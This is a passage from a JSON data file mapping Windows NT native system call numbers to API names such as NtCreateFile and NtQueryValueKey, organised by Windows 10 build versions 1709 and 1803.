"NtQueryInformationResourceManager", "320": "NtQueryInformationTransaction", "321": "NtQueryInformationTransactionManager", "322": "NtQueryInformationWorkerFactory", "323": "NtQueryInstallUILanguage", "324": "NtQueryIntervalProfile", "325": "NtQueryIoCompletion", "326": "NtQueryLicenseValue", "327": "NtQueryMultipleValueKey", "328": "NtQueryMutant", "329": "NtQueryOpenSubKeys", "330": "NtQueryOpenSubKeysEx", "331": "NtQueryPortInformationProcess", "332": "NtQueryQuotaInformationFile", "333": "NtQuerySecurityAttributesToken", "334": "NtQuerySecurityObject", "335": "NtQuerySecurityPolicy", "336": "NtQuerySemaphore", "337": "NtQuerySymbolicLinkObject", "338": "NtQuerySystemEnvironmentValue", "339": "NtQuerySystemEnvironmentValueEx", "340": "NtQuerySystemInformationEx", "341": "NtQueryTimerResolution", "342": "NtQueryWnfStateData", "343": "NtQueryWnfStateNameInformation", "344": "NtQueueApcThreadEx", "345": "NtRaiseException", "346": "NtRaiseHardError", "347": "NtReadOnlyEnlistment", "348": "NtRecoverEnlistment", "349": "NtRecoverResourceManager", "350": "NtRecoverTransactionManager", "351": "NtRegisterProtocolAddressInformation", "352": "NtRegisterThreadTerminatePort", "353": "NtReleaseKeyedEvent", "354": "NtReleaseWorkerFactoryWorker", "355": "NtRemoveIoCompletionEx", "356": "NtRemoveProcessDebug", "357": "NtRenameKey", "358": "NtRenameTransactionManager", "359": "NtReplaceKey", "360": "NtReplacePartitionUnit", "361": "NtReplyWaitReplyPort", "362": "NtRequestPort", "363": "NtResetEvent", "364": "NtResetWriteWatch", "365": "NtRestoreKey", "366": "NtResumeProcess", "367": "NtRevertContainerImpersonation", "368": "NtRollbackComplete", "369": "NtRollbackEnlistment", "370": "NtRollbackRegistryTransaction", "371": "NtRollbackTransaction", "372": "NtRollforwardTransactionManager", "373": "NtSaveKey", "374": "NtSaveKeyEx", "375": "NtSaveMergedKeys", "376": "NtSecureConnectPort", "377": "NtSerializeBoot", "378": "NtSetBootEntryOrder", "379": "NtSetBootOptions", "380": "NtSetCachedSigningLevel", "381": "NtSetCachedSigningLevel2", "382": "NtSetContextThread", "383": "NtSetDebugFilterState", "384": "NtSetDefaultHardErrorPort", "385": "NtSetDefaultLocale", "386": "NtSetDefaultUILanguage", "387": "NtSetDriverEntryOrder", "388": "NtSetEaFile", "389": "NtSetHighEventPair", "390": "NtSetHighWaitLowEventPair", "391": "NtSetIRTimer", "392": "NtSetInformationDebugObject", "393": "NtSetInformationEnlistment", "394": "NtSetInformationJobObject", "395": "NtSetInformationKey", "396": "NtSetInformationResourceManager", "397": "NtSetInformationSymbolicLink", "398": "NtSetInformationToken", "399": "NtSetInformationTransaction", "400": "NtSetInformationTransactionManager", "401": "NtSetInformationVirtualMemory", "402": "NtSetInformationWorkerFactory", "403": "NtSetIntervalProfile", "404": "NtSetIoCompletion", "405": "NtSetIoCompletionEx", "406": "NtSetLdtEntries", "407": "NtSetLowEventPair", "408": "NtSetLowWaitHighEventPair", "409": "NtSetQuotaInformationFile", "410": "NtSetSecurityObject", "411": "NtSetSystemEnvironmentValue", "412": "NtSetSystemEnvironmentValueEx", "413": "NtSetSystemInformation", "414": "NtSetSystemPowerState", "415": "NtSetSystemTime", "416": "NtSetThreadExecutionState", "417": "NtSetTimer2", "418": "NtSetTimerEx", "419": "NtSetTimerResolution", "420": "NtSetUuidSeed", "421": "NtSetVolumeInformationFile", "422": "NtSetWnfProcessNotificationEvent", "423": "NtShutdownSystem", "424": "NtShutdownWorkerFactory", "425": "NtSignalAndWaitForSingleObject", "426": "NtSinglePhaseReject", "427": "NtStartProfile", "428": "NtStopProfile", "429": "NtSubscribeWnfStateChange", "430": "NtSuspendProcess", "431": "NtSuspendThread", "432": "NtSystemDebugControl", "433": "NtTerminateJobObject", "434": "NtTestAlert", "435": "NtThawRegistry", "436": "NtThawTransactions", "437": "NtTraceControl", "438": "NtTranslateFilePath", "439": "NtUmsThreadYield", "440": "NtUnloadDriver", "441": "NtUnloadKey", "442": "NtUnloadKey2", "443": "NtUnloadKeyEx", "444": "NtUnlockFile", "445": "NtUnlockVirtualMemory", "446": "NtUnmapViewOfSectionEx", "447": "NtUnsubscribeWnfStateChange", "448": "NtUpdateWnfStateData", "449": "NtVdmControl", "450": "NtWaitForAlertByThreadId", "451": "NtWaitForDebugEvent", "452": "NtWaitForKeyedEvent", "453": "NtWaitForWorkViaWorkerFactory", "454": "NtWaitHighEventPair", "455": "NtWaitLowEventPair"}, "1709": {"0": "NtAccessCheck", "1": "NtWorkerFactoryWorkerReady", "2": "NtAcceptConnectPort", "3": "NtMapUserPhysicalPagesScatter", "4": "NtWaitForSingleObject", "5": "NtCallbackReturn", "6": "NtReadFile", "7": "NtDeviceIoControlFile", "8": "NtWriteFile", "9": "NtRemoveIoCompletion", "10": "NtReleaseSemaphore", "11": "NtReplyWaitReceivePort", "12": "NtReplyPort", "13": "NtSetInformationThread", "14": "NtSetEvent", "15": "NtClose", "16": "NtQueryObject", "17": "NtQueryInformationFile", "18": "NtOpenKey", "19": "NtEnumerateValueKey", "20": "NtFindAtom", "21": "NtQueryDefaultLocale", "22": "NtQueryKey", "23": "NtQueryValueKey", "24": "NtAllocateVirtualMemory", "25": "NtQueryInformationProcess", "26": "NtWaitForMultipleObjects32", "27": "NtWriteFileGather", "28": "NtSetInformationProcess", "29": "NtCreateKey", "30": "NtFreeVirtualMemory", "31": "NtImpersonateClientOfPort", "32": "NtReleaseMutant", "33": "NtQueryInformationToken", "34": "NtRequestWaitReplyPort", "35": "NtQueryVirtualMemory", "36": "NtOpenThreadToken", "37": "NtQueryInformationThread", "38": "NtOpenProcess", "39": "NtSetInformationFile", "40": "NtMapViewOfSection", "41": "NtAccessCheckAndAuditAlarm", "42": "NtUnmapViewOfSection", "43": "NtReplyWaitReceivePortEx", "44": "NtTerminateProcess", "45": "NtSetEventBoostPriority", "46": "NtReadFileScatter", "47": "NtOpenThreadTokenEx", "48": "NtOpenProcessTokenEx", "49": "NtQueryPerformanceCounter", "50": "NtEnumerateKey", "51": "NtOpenFile", "52": "NtDelayExecution", "53": "NtQueryDirectoryFile", "54": "NtQuerySystemInformation", "55": "NtOpenSection", "56": "NtQueryTimer", "57": "NtFsControlFile", "58": "NtWriteVirtualMemory", "59": "NtCloseObjectAuditAlarm", "60": "NtDuplicateObject", "61": "NtQueryAttributesFile", "62": "NtClearEvent", "63": "NtReadVirtualMemory", "64": "NtOpenEvent", "65": "NtAdjustPrivilegesToken", "66": "NtDuplicateToken", "67": "NtContinue", "68": "NtQueryDefaultUILanguage", "69": "NtQueueApcThread", "70": "NtYieldExecution", "71": "NtAddAtom", "72": "NtCreateEvent", "73": "NtQueryVolumeInformationFile", "74": "NtCreateSection", "75": "NtFlushBuffersFile", "76": "NtApphelpCacheControl", "77": "NtCreateProcessEx", "78": "NtCreateThread", "79": "NtIsProcessInJob", "80": "NtProtectVirtualMemory", "81": "NtQuerySection", "82": "NtResumeThread", "83": "NtTerminateThread", "84": "NtReadRequestData", "85": "NtCreateFile", "86": "NtQueryEvent", "87": "NtWriteRequestData", "88": "NtOpenDirectoryObject", "89": "NtAccessCheckByTypeAndAuditAlarm", "90": "NtQuerySystemTime", "91": "NtWaitForMultipleObjects", "92": "NtSetInformationObject", "93": "NtCancelIoFile", "94": "NtTraceEvent", "95": "NtPowerInformation", "96": "NtSetValueKey", "97": "NtCancelTimer", "98": "NtSetTimer", "99": "NtAccessCheckByType", "100": "NtAccessCheckByTypeResultList", "101": "NtAccessCheckByTypeResultListAndAuditAlarm", "102": "NtAccessCheckByTypeResultListAndAuditAlarmByHandle", "103": "NtAcquireProcessActivityReference", "104": "NtAddAtomEx", "105": "NtAddBootEntry", "106": "NtAddDriverEntry", "107": "NtAdjustGroupsToken", "108": "NtAdjustTokenClaimsAndDeviceGroups", "109": "NtAlertResumeThread", "110": "NtAlertThread", "111": "NtAlertThreadByThreadId", "112": "NtAllocateLocallyUniqueId", "113": "NtAllocateReserveObject", "114": "NtAllocateUserPhysicalPages", "115": "NtAllocateUuids", "116": "NtAlpcAcceptConnectPort", "117": "NtAlpcCancelMessage", "118": "NtAlpcConnectPort", "119": "NtAlpcConnectPortEx", "120": "NtAlpcCreatePort", "121": "NtAlpcCreatePortSection", "122": "NtAlpcCreateResourceReserve", "123": "NtAlpcCreateSectionView", "124": "NtAlpcCreateSecurityContext", "125": "NtAlpcDeletePortSection", "126": "NtAlpcDeleteResourceReserve", "127": "NtAlpcDeleteSectionView", "128": "NtAlpcDeleteSecurityContext", "129": "NtAlpcDisconnectPort", "130": "NtAlpcImpersonateClientContainerOfPort", "131": "NtAlpcImpersonateClientOfPort", "132": "NtAlpcOpenSenderProcess", "133": "NtAlpcOpenSenderThread", "134": "NtAlpcQueryInformation", "135": "NtAlpcQueryInformationMessage", "136": "NtAlpcRevokeSecurityContext", "137": "NtAlpcSendWaitReceivePort", "138": "NtAlpcSetInformation", "139": "NtAreMappedFilesTheSame", "140": "NtAssignProcessToJobObject", "141": "NtAssociateWaitCompletionPacket", "142": "NtCallEnclave", "143": "NtCancelIoFileEx", "144": "NtCancelSynchronousIoFile", "145": "NtCancelTimer2", "146": "NtCancelWaitCompletionPacket", "147": "NtCommitComplete", "148": "NtCommitEnlistment", "149": "NtCommitRegistryTransaction", "150": "NtCommitTransaction", "151": "NtCompactKeys", "152": "NtCompareObjects", "153": "NtCompareSigningLevels", "154": "NtCompareTokens", "155": "NtCompleteConnectPort", "156": "NtCompressKey", "157": "NtConnectPort", "158": "NtConvertBetweenAuxiliaryCounterAndPerformanceCounter", "159": "NtCreateDebugObject", "160": "NtCreateDirectoryObject", "161": "NtCreateDirectoryObjectEx", "162": "NtCreateEnclave", "163": "NtCreateEnlistment", "164": "NtCreateEventPair", "165": "NtCreateIRTimer", "166": "NtCreateIoCompletion", "167": "NtCreateJobObject", "168": "NtCreateJobSet", "169": "NtCreateKeyTransacted", "170": "NtCreateKeyedEvent", "171": "NtCreateLowBoxToken", "172": "NtCreateMailslotFile", "173": "NtCreateMutant", "174": "NtCreateNamedPipeFile", "175": "NtCreatePagingFile", "176": "NtCreatePartition", "177": "NtCreatePort", "178": "NtCreatePrivateNamespace", "179": "NtCreateProcess", "180": "NtCreateProfile", "181": "NtCreateProfileEx", "182": "NtCreateRegistryTransaction", "183": "NtCreateResourceManager", "184": "NtCreateSemaphore", "185": "NtCreateSymbolicLinkObject", "186": "NtCreateThreadEx", "187": "NtCreateTimer", "188": "NtCreateTimer2", "189": "NtCreateToken", "190": "NtCreateTokenEx", "191": "NtCreateTransaction", "192": "NtCreateTransactionManager", "193": "NtCreateUserProcess", "194": "NtCreateWaitCompletionPacket", "195": "NtCreateWaitablePort", "196": "NtCreateWnfStateName", "197": "NtCreateWorkerFactory", "198": "NtDebugActiveProcess", "199": "NtDebugContinue", "200": "NtDeleteAtom", "201": "NtDeleteBootEntry", "202": "NtDeleteDriverEntry", "203": "NtDeleteFile", "204": "NtDeleteKey", "205": "NtDeleteObjectAuditAlarm", "206": "NtDeletePrivateNamespace", "207": "NtDeleteValueKey", "208": "NtDeleteWnfStateData", "209": "NtDeleteWnfStateName", "210": "NtDisableLastKnownGood", "211": "NtDisplayString", "212": "NtDrawText", "213": "NtEnableLastKnownGood", "214": "NtEnumerateBootEntries", "215": "NtEnumerateDriverEntries", "216": "NtEnumerateSystemEnvironmentValuesEx", "217": "NtEnumerateTransactionObject", "218": "NtExtendSection", "219": "NtFilterBootOption", "220": "NtFilterToken", "221": "NtFilterTokenEx", "222": "NtFlushBuffersFileEx", "223": "NtFlushInstallUILanguage", "224": "NtFlushInstructionCache", "225": "NtFlushKey", "226": "NtFlushProcessWriteBuffers", "227": "NtFlushVirtualMemory", "228": "NtFlushWriteBuffer", "229": "NtFreeUserPhysicalPages", "230": "NtFreezeRegistry", "231": "NtFreezeTransactions", "232": "NtGetCachedSigningLevel", "233": "NtGetCompleteWnfStateSubscription", "234": "NtGetContextThread", "235": "NtGetCurrentProcessorNumber", "236": "NtGetCurrentProcessorNumberEx", "237": "NtGetDevicePowerState", "238": "NtGetMUIRegistryInfo", "239": "NtGetNextProcess", "240": "NtGetNextThread", "241": "NtGetNlsSectionPtr", "242": "NtGetNotificationResourceManager", "243": "NtGetWriteWatch", "244": "NtImpersonateAnonymousToken", "245": "NtImpersonateThread", "246": "NtInitializeEnclave", "247": "NtInitializeNlsFiles", "248": "NtInitializeRegistry", "249": "NtInitiatePowerAction", "250": "NtIsSystemResumeAutomatic", "251": "NtIsUILanguageComitted", "252": "NtListenPort", "253": "NtLoadDriver", "254": "NtLoadEnclaveData", "255": "NtLoadHotPatch", "256": "NtLoadKey", "257": "NtLoadKey2", "258": "NtLoadKeyEx", "259": "NtLockFile", "260": "NtLockProductActivationKeys", "261": "NtLockRegistryKey", "262": "NtLockVirtualMemory", "263": "NtMakePermanentObject", "264": "NtMakeTemporaryObject", "265": "NtManagePartition", "266": "NtMapCMFModule", "267": "NtMapUserPhysicalPages", "268": "NtModifyBootEntry", "269": "NtModifyDriverEntry", "270": "NtNotifyChangeDirectoryFile", "271": "NtNotifyChangeDirectoryFileEx", "272": "NtNotifyChangeKey", "273": "NtNotifyChangeMultipleKeys", "274": "NtNotifyChangeSession", "275": "NtOpenEnlistment", "276": "NtOpenEventPair", "277": "NtOpenIoCompletion", "278": "NtOpenJobObject", "279": "NtOpenKeyEx", "280": "NtOpenKeyTransacted", "281": "NtOpenKeyTransactedEx", "282": "NtOpenKeyedEvent", "283": "NtOpenMutant", "284": "NtOpenObjectAuditAlarm", "285": "NtOpenPartition", "286": "NtOpenPrivateNamespace", "287": "NtOpenProcessToken", "288": "NtOpenRegistryTransaction", "289": "NtOpenResourceManager", "290": "NtOpenSemaphore", "291": "NtOpenSession", "292": "NtOpenSymbolicLinkObject", "293": "NtOpenThread", "294": "NtOpenTimer", "295": "NtOpenTransaction", "296": "NtOpenTransactionManager", "297": "NtPlugPlayControl", "298": "NtPrePrepareComplete", "299": "NtPrePrepareEnlistment", "300": "NtPrepareComplete", "301": "NtPrepareEnlistment", "302": "NtPrivilegeCheck", "303": "NtPrivilegeObjectAuditAlarm", "304": "NtPrivilegedServiceAuditAlarm", "305": "NtPropagationComplete", "306": "NtPropagationFailed", "307": "NtPulseEvent", "308": "NtQueryAuxiliaryCounterFrequency", "309": "NtQueryBootEntryOrder", "310": "NtQueryBootOptions", "311": "NtQueryDebugFilterState", "312": "NtQueryDirectoryFileEx", "313": "NtQueryDirectoryObject", "314": "NtQueryDriverEntryOrder", "315": "NtQueryEaFile", "316": "NtQueryFullAttributesFile", "317": "NtQueryInformationAtom", "318": "NtQueryInformationByName", "319": "NtQueryInformationEnlistment", "320": "NtQueryInformationJobObject", "321": "NtQueryInformationPort", "322": "NtQueryInformationResourceManager", "323": "NtQueryInformationTransaction", "324": "NtQueryInformationTransactionManager", "325": "NtQueryInformationWorkerFactory", "326": "NtQueryInstallUILanguage", "327": "NtQueryIntervalProfile", "328": "NtQueryIoCompletion", "329": "NtQueryLicenseValue", "330": "NtQueryMultipleValueKey", "331": "NtQueryMutant", "332": "NtQueryOpenSubKeys", "333": "NtQueryOpenSubKeysEx", "334": "NtQueryPortInformationProcess", "335": "NtQueryQuotaInformationFile", "336": "NtQuerySecurityAttributesToken", "337": "NtQuerySecurityObject", "338": "NtQuerySecurityPolicy", "339": "NtQuerySemaphore", "340": "NtQuerySymbolicLinkObject", "341": "NtQuerySystemEnvironmentValue", "342": "NtQuerySystemEnvironmentValueEx", "343": "NtQuerySystemInformationEx", "344": "NtQueryTimerResolution", "345": "NtQueryWnfStateData", "346": "NtQueryWnfStateNameInformation", "347": "NtQueueApcThreadEx", "348": "NtRaiseException", "349": "NtRaiseHardError", "350": "NtReadOnlyEnlistment", "351": "NtRecoverEnlistment", "352": "NtRecoverResourceManager", "353": "NtRecoverTransactionManager", "354": "NtRegisterProtocolAddressInformation", "355": "NtRegisterThreadTerminatePort", "356": "NtReleaseKeyedEvent", "357": "NtReleaseWorkerFactoryWorker", "358": "NtRemoveIoCompletionEx", "359": "NtRemoveProcessDebug", "360": "NtRenameKey", "361": "NtRenameTransactionManager", "362": "NtReplaceKey", "363": "NtReplacePartitionUnit", "364": "NtReplyWaitReplyPort", "365": "NtRequestPort", "366": "NtResetEvent", "367": "NtResetWriteWatch", "368": "NtRestoreKey", "369": "NtResumeProcess", "370": "NtRevertContainerImpersonation", "371": "NtRollbackComplete", "372": "NtRollbackEnlistment", "373": "NtRollbackRegistryTransaction", "374": "NtRollbackTransaction", "375": "NtRollforwardTransactionManager", "376": "NtSaveKey", "377": "NtSaveKeyEx", "378": "NtSaveMergedKeys", "379": "NtSecureConnectPort", "380": "NtSerializeBoot", "381": "NtSetBootEntryOrder", "382": "NtSetBootOptions", "383": "NtSetCachedSigningLevel", "384": "NtSetCachedSigningLevel2", "385": "NtSetContextThread", "386": "NtSetDebugFilterState", "387": "NtSetDefaultHardErrorPort", "388": "NtSetDefaultLocale", "389": "NtSetDefaultUILanguage", "390": "NtSetDriverEntryOrder", "391": "NtSetEaFile", "392": "NtSetHighEventPair", "393": "NtSetHighWaitLowEventPair", "394": "NtSetIRTimer", "395": "NtSetInformationDebugObject", "396": "NtSetInformationEnlistment", "397": "NtSetInformationJobObject", "398": "NtSetInformationKey", "399": "NtSetInformationResourceManager", "400": "NtSetInformationSymbolicLink", "401": "NtSetInformationToken", "402": "NtSetInformationTransaction", "403": "NtSetInformationTransactionManager", "404": "NtSetInformationVirtualMemory", "405": "NtSetInformationWorkerFactory", "406": "NtSetIntervalProfile", "407": "NtSetIoCompletion", "408": "NtSetIoCompletionEx", "409": "NtSetLdtEntries", "410": "NtSetLowEventPair", "411": "NtSetLowWaitHighEventPair", "412": "NtSetQuotaInformationFile", "413": "NtSetSecurityObject", "414": "NtSetSystemEnvironmentValue", "415": "NtSetSystemEnvironmentValueEx", "416": "NtSetSystemInformation", "417": "NtSetSystemPowerState", "418": "NtSetSystemTime", "419": "NtSetThreadExecutionState", "420": "NtSetTimer2", "421": "NtSetTimerEx", "422": "NtSetTimerResolution", "423": "NtSetUuidSeed", "424": "NtSetVolumeInformationFile", "425": "NtSetWnfProcessNotificationEvent", "426": "NtShutdownSystem", "427": "NtShutdownWorkerFactory", "428": "NtSignalAndWaitForSingleObject", "429": "NtSinglePhaseReject", "430": "NtStartProfile", "431": "NtStopProfile", "432": "NtSubscribeWnfStateChange", "433": "NtSuspendProcess", "434": "NtSuspendThread", "435": "NtSystemDebugControl", "436": "NtTerminateEnclave", "437": "NtTerminateJobObject", "438": "NtTestAlert", "439": "NtThawRegistry", "440": "NtThawTransactions", "441": "NtTraceControl", "442": "NtTranslateFilePath", "443": "NtUmsThreadYield", "444": "NtUnloadDriver", "445": "NtUnloadKey", "446": "NtUnloadKey2", "447": "NtUnloadKeyEx", "448": "NtUnlockFile", "449": "NtUnlockVirtualMemory", "450": "NtUnmapViewOfSectionEx", "451": "NtUnsubscribeWnfStateChange", "452": "NtUpdateWnfStateData", "453": "NtVdmControl", "454": "NtWaitForAlertByThreadId", "455": "NtWaitForDebugEvent", "456": "NtWaitForKeyedEvent", "457": "NtWaitForWorkViaWorkerFactory", "458": "NtWaitHighEventPair", "459": "NtWaitLowEventPair"}, "1803": {"0": "NtAccessCheck", "1": "NtWorkerFactoryWorkerReady", "2": "NtAcceptConnectPort", "3": "NtMapUserPhysicalPagesScatter", "4": "NtWaitForSingleObject", "5": "NtCallbackReturn", "6": "NtReadFile", "7": "NtDeviceIoControlFile", "8": "NtWriteFile", "9": "NtRemoveIoCompletion", "10": "NtReleaseSemaphore", "11": "NtReplyWaitReceivePort", "12": "NtReplyPort", "13": "NtSetInformationThread", "14": "NtSetEvent", "15": "NtClose", "16": "NtQueryObject", "17": "NtQueryInformationFile", "18": "NtOpenKey", "19": "NtEnumerateValueKey", "20": "NtFindAtom", "21": "NtQueryDefaultLocale", "22": "NtQueryKey", "23": "NtQueryValueKey", "24": "NtAllocateVirtualMemory", "25": "NtQueryInformationProcess", "26": "NtWaitForMultipleObjects32", "27": "NtWriteFileGather", "28": "NtSetInformationProcess", "29": "NtCreateKey", "30": "NtFreeVirtualMemory", "31": "NtImpersonateClientOfPort", "32": "NtReleaseMutant", "33": "NtQueryInformationToken", "34": "NtRequestWaitReplyPort", "35": "NtQueryVirtualMemory", "36": "NtOpenThreadToken", "37": "NtQueryInformationThread", "38": "NtOpenProcess", "39": "NtSetInformationFile", "40": "NtMapViewOfSection", "41": "NtAccessCheckAndAuditAlarm", "42": "NtUnmapViewOfSection", "43": "NtReplyWaitReceivePortEx", "44": "NtTerminateProcess", "45": "NtSetEventBoostPriority", "46": "NtReadFileScatter", "47": "NtOpenThreadTokenEx", "48": "NtOpenProcessTokenEx", "49": "NtQueryPerformanceCounter", "50": "NtEnumerateKey", "51": "NtOpenFile", "52": "NtDelayExecution", "53": "NtQueryDirectoryFile", "54": "NtQuerySystemInformation", "55": "NtOpenSection", "56": "NtQueryTimer", "57": "NtFsControlFile", "58": "NtWriteVirtualMemory", "59": "NtCloseObjectAuditAlarm", "60": "NtDuplicateObject", "61": "NtQueryAttributesFile", "62": "NtClearEvent", "63": "NtReadVirtualMemory", "64": "NtOpenEvent", "65": "NtAdjustPrivilegesToken", "66": "NtDuplicateToken", "67": "NtContinue", "68": "NtQueryDefaultUILanguage", "69": "NtQueueApcThread", "70": "NtYieldExecution", "71": "NtAddAtom", "72": "NtCreateEvent", "73": "NtQueryVolumeInformationFile", "74": "NtCreateSection", "75": "NtFlushBuffersFile", "76": "NtApphelpCacheControl", "77": "NtCreateProcessEx", "78": "NtCreateThread", "79": "NtIsProcessInJob", "80": "NtProtectVirtualMemory", "81": "NtQuerySection", "82": "NtResumeThread", "83": "NtTerminateThread", "84": "NtReadRequestData", "85": "NtCreateFile", "86": "NtQueryEvent", "87": "NtWriteRequestData", "88": "NtOpenDirectoryObject", "89": "NtAccessCheckByTypeAndAuditAlarm", "90": "NtQuerySystemTime", "91": "NtWaitForMultipleObjects", "92": "NtSetInformationObject", "93": "NtCancelIoFile", "94": "NtTraceEvent", "95": "NtPowerInformation", "96": "NtSetValueKey", "97": "NtCancelTimer", "98": "NtSetTimer", "99": "NtAccessCheckByType", "100": "NtAccessCheckByTypeResultList", "101": "NtAccessCheckByTypeResultListAndAuditAlarm", "102": "NtAccessCheckByTypeResultListAndAuditAlarmByHandle", "103": "NtAcquireProcessActivityReference", "104": "NtAddAtomEx", "105": "NtAddBootEntry", "106": "NtAddDriverEntry", "107": "NtAdjustGroupsToken", "108": "NtAdjustTokenClaimsAndDeviceGroups", "109": "NtAlertResumeThread", "110": "NtAlertThread", "111": "NtAlertThreadByThreadId", "112": "NtAllocateLocallyUniqueId", "113": "NtAllocateReserveObject", "114": "NtAllocateUserPhysicalPages", "115": "NtAllocateUuids", "116": "NtAllocateVirtualMemoryEx", "117": "NtAlpcAcceptConnectPort", "118": "NtAlpcCancelMessage", "119": "NtAlpcConnectPort", "120": "NtAlpcConnectPortEx", "121": "NtAlpcCreatePort", "122": "NtAlpcCreatePortSection", "123": "NtAlpcCreateResourceReserve", "124": "NtAlpcCreateSectionView", "125": "NtAlpcCreateSecurityContext", "126": "NtAlpcDeletePortSection", "127": "NtAlpcDeleteResourceReserve", "128": "NtAlpcDeleteSectionView", "129": "NtAlpcDeleteSecurityContext", "130": "NtAlpcDisconnectPort", "131": "NtAlpcImpersonateClientContainerOfPort", "132": "NtAlpcImpersonateClientOfPort", "133": "NtAlpcOpenSenderProcess", "134": "NtAlpcOpenSenderThread", "135": "NtAlpcQueryInformation", "136": "NtAlpcQueryInformationMessage", "137": "NtAlpcRevokeSecurityContext", "138": "NtAlpcSendWaitReceivePort", "139": "NtAlpcSetInformation", "140": "NtAreMappedFilesTheSame", "141": "NtAssignProcessToJobObject", "142": "NtAssociateWaitCompletionPacket", "143": "NtCallEnclave", "144": "NtCancelIoFileEx", "145": "NtCancelSynchronousIoFile", "146": "NtCancelTimer2", "147": "NtCancelWaitCompletionPacket", "148": "NtCommitComplete", "149": "NtCommitEnlistment", "150": "NtCommitRegistryTransaction", "151": "NtCommitTransaction", "152": "NtCompactKeys", "153": "NtCompareObjects", "154": "NtCompareSigningLevels", "155": "NtCompareTokens", "156": "NtCompleteConnectPort", "157": "NtCompressKey", "158": "NtConnectPort", "159": "NtConvertBetweenAuxiliaryCounterAndPerformanceCounter", "160": "NtCreateDebugObject", "161": "NtCreateDirectoryObject", "162": "NtCreateDirectoryObjectEx", "163": "NtCreateEnclave", "164": "NtCreateEnlistment", "165": "NtCreateEventPair", "166": "NtCreateIRTimer", "167": "NtCreateIoCompletion", "168": "NtCreateJobObject", "169": "NtCreateJobSet", "170": "NtCreateKeyTransacted", "171": "NtCreateKeyedEvent", "172": "NtCreateLowBoxToken", "173": "NtCreateMailslotFile", "174": "NtCreateMutant", "175": "NtCreateNamedPipeFile", "176": "NtCreatePagingFile", "177": "NtCreatePartition", "178": "NtCreatePort", "179": "NtCreatePrivateNamespace", "180": "NtCreateProcess", "181": "NtCreateProfile", "182": "NtCreateProfileEx", "183": "NtCreateRegistryTransaction", "184": "NtCreateResourceManager", "185": "NtCreateSemaphore", "186": "NtCreateSymbolicLinkObject", "187": "NtCreateThreadEx", "188": "NtCreateTimer", "189": "NtCreateTimer2", "190": "NtCreateToken", "191": "NtCreateTokenEx", "192": "NtCreateTransaction", "193": "NtCreateTransactionManager", "194": "NtCreateUserProcess", "195": "NtCreateWaitCompletionPacket", "196": "NtCreateWaitablePort", "197": "NtCreateWnfStateName", "198": "NtCreateWorkerFactory", "199": "NtDebugActiveProcess", "200": "NtDebugContinue", "201": "NtDeleteAtom", "202": "NtDeleteBootEntry", "203": "NtDeleteDriverEntry", "204": "NtDeleteFile", "205": "NtDeleteKey", "206": "NtDeleteObjectAuditAlarm", "207": "NtDeletePrivateNamespace", "208": "NtDeleteValueKey", "209": "NtDeleteWnfStateData", "210": "NtDeleteWnfStateName", "211": "NtDisableLastKnownGood", "212": "NtDisplayString", "213": "NtDrawText", "214": "NtEnableLastKnownGood", "215": "NtEnumerateBootEntries", "216": "NtEnumerateDriverEntries", "217": "NtEnumerateSystemEnvironmentValuesEx", "218": "NtEnumerateTransactionObject", "219": "NtExtendSection", "220": "NtFilterBootOption", "221": "NtFilterToken", "222": "NtFilterTokenEx", "223": "NtFlushBuffersFileEx", "224": "NtFlushInstallUILanguage", "225": "NtFlushInstructionCache", "226": "NtFlushKey", "227": "NtFlushProcessWriteBuffers", "228": "NtFlushVirtualMemory", "229": "NtFlushWriteBuffer", "230": "NtFreeUserPhysicalPages", "231": "NtFreezeRegistry", "232": "NtFreezeTransactions", "233": "NtGetCachedSigningLevel", "234": "NtGetCompleteWnfStateSubscription", "235": "NtGetContextThread", "236": "NtGetCurrentProcessorNumber", "237": "NtGetCurrentProcessorNumberEx", "238": "NtGetDevicePowerState", "239": "NtGetMUIRegistryInfo", "240": "NtGetNextProcess", "241": "NtGetNextThread", "242": "NtGetNlsSectionPtr", "243": "NtGetNotificationResourceManager", "244": "NtGetWriteWatch", "245": "NtImpersonateAnonymousToken", "246": "NtImpersonateThread", "247": "NtInitializeEnclave", "248": "NtInitializeNlsFiles", "249": "NtInitializeRegistry", "250": "NtInitiatePowerAction", "251": "NtIsSystemResumeAutomatic", "252": "NtIsUILanguageComitted", "253": "NtListenPort", "254": "NtLoadDriver", "255": "NtLoadEnclaveData", "256": "NtLoadHotPatch", "257": "NtLoadKey", "258": "NtLoadKey2", "259": "NtLoadKeyEx", "260": "NtLockFile", "261": "NtLockProductActivationKeys", "262": "NtLockRegistryKey", "263": "NtLockVirtualMemory", "264": "NtMakePermanentObject", "265": "NtMakeTemporaryObject", "266": "NtManagePartition", "267": "NtMapCMFModule", "268": "NtMapUserPhysicalPages", "269": "NtMapViewOfSectionEx", "270": "NtModifyBootEntry", "271": "NtModifyDriverEntry", "272": "NtNotifyChangeDirectoryFile", "273": "NtNotifyChangeDirectoryFileEx", "274": "NtNotifyChangeKey", "275": "NtNotifyChangeMultipleKeys", "276": "NtNotifyChangeSession", "277": "NtOpenEnlistment", "278": "NtOpenEventPair", "279": "NtOpenIoCompletion", "280": "NtOpenJobObject", "281": "NtOpenKeyEx", "282": "NtOpenKeyTransacted", "283": "NtOpenKeyTransactedEx", "284": "NtOpenKeyedEvent", "285": "NtOpenMutant", "286": "NtOpenObjectAuditAlarm", "287": "NtOpenPartition", "288": "NtOpenPrivateNamespace", "289": "NtOpenProcessToken", "290": "NtOpenRegistryTransaction", "291": "NtOpenResourceManager", "292": "NtOpenSemaphore", "293": "NtOpenSession", "294": "NtOpenSymbolicLinkObject", "295": "NtOpenThread", "296": "NtOpenTimer", "297": "NtOpenTransaction", "298": "NtOpenTransactionManager", "299": "NtPlugPlayControl", "300": "NtPrePrepareComplete", "301": "NtPrePrepareEnlistment", "302": "NtPrepareComplete", "303": "NtPrepareEnlistment", "304": "NtPrivilegeCheck", "305": "NtPrivilegeObjectAuditAlarm", "306": "NtPrivilegedServiceAuditAlarm", "307": "NtPropagationComplete", "308": "NtPropagationFailed", "309": "NtPulseEvent", "310": "NtQueryAuxiliaryCounterFrequency", "311": "NtQueryBootEntryOrder", "312": "NtQueryBootOptions", "313": "NtQueryDebugFilterState", "314": "NtQueryDirectoryFileEx", "315": "NtQueryDirectoryObject", "316": "NtQueryDriverEntryOrder", "317": "NtQueryEaFile", "318": "NtQueryFullAttributesFile", "319": "NtQueryInformationAtom", "320": "NtQueryInformationByName", "321": "NtQueryInformationEnlistment", "322": "NtQueryInformationJobObject", "323": "NtQueryInformationPort", "324": "NtQueryInformationResourceManager", "325": "NtQueryInformationTransaction", "326": "NtQueryInformationTransactionManager", 